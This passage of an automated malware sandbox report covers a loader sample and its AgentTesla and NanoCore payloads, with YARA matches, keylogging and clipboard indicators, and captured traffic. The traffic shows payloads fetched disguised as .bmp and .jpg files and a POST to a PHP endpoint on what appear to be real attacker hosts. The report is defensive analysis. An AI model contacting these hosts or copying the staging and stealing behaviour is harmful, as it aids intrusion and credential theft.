                Source: InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%appdata
                Source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: InstallUtil.exe, 0000000E.00000002.492466888.000000000329B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gqbmwswBay.org
                Source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: InstallUtil.exe, 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Source: InstallUtil.exe, 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASS

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Qqsucntzxgqwkiqkvrafiufflip.exe PID: 6528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6288, type: MEMORYSTR

                System Summary

                barindex
                Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.3.Qjarsxlh.exe.4548ea0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.2.Qjarsxlh.exe.61c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 0.2.TM57812337.exe.52c0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 16.2.Qjarsxlh.exe.59f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 16.3.Qjarsxlh.exe.3c38e80.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 15.3.Qjarsxlh.exe.4488e60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 33.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 16.2.Qjarsxlh.exe.3b87b90.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.3.TM57812337.exe.36e8e80.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 33.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.3.Qjarsxlh.exe.4548ea0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3ed0b10.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 0.2.TM57812337.exe.52c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 15.3.Qjarsxlh.exe.44c8e80.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3fb0b70.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 33.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.Qjarsxlh.exe.61c0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 16.3.Qjarsxlh.exe.3c38e80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 16.3.Qjarsxlh.exe.3bf8e60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 15.2.Qjarsxlh.exe.4417b90.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 32.2.InstallUtil.exe.2fcb430.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.2.InstallUtil.exe.2fcb430.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 16.3.Qjarsxlh.exe.3bd8e40.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 16.2.Qjarsxlh.exe.3b87b90.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.3.TM57812337.exe.3768ea0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.3.Qjarsxlh.exe.44c8e80.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 32.2.InstallUtil.exe.6090000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.2.InstallUtil.exe.6090000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 33.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 16.3.Qjarsxlh.exe.3cb8ea0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 16.3.Qjarsxlh.exe.3cb8ea0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3f30b50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0.3.TM57812337.exe.36e8e80.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 33.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3f30b50.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 16.2.Qjarsxlh.exe.59f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 0.2.TM57812337.exe.3637b90.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.Qjarsxlh.exe.4417b90.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
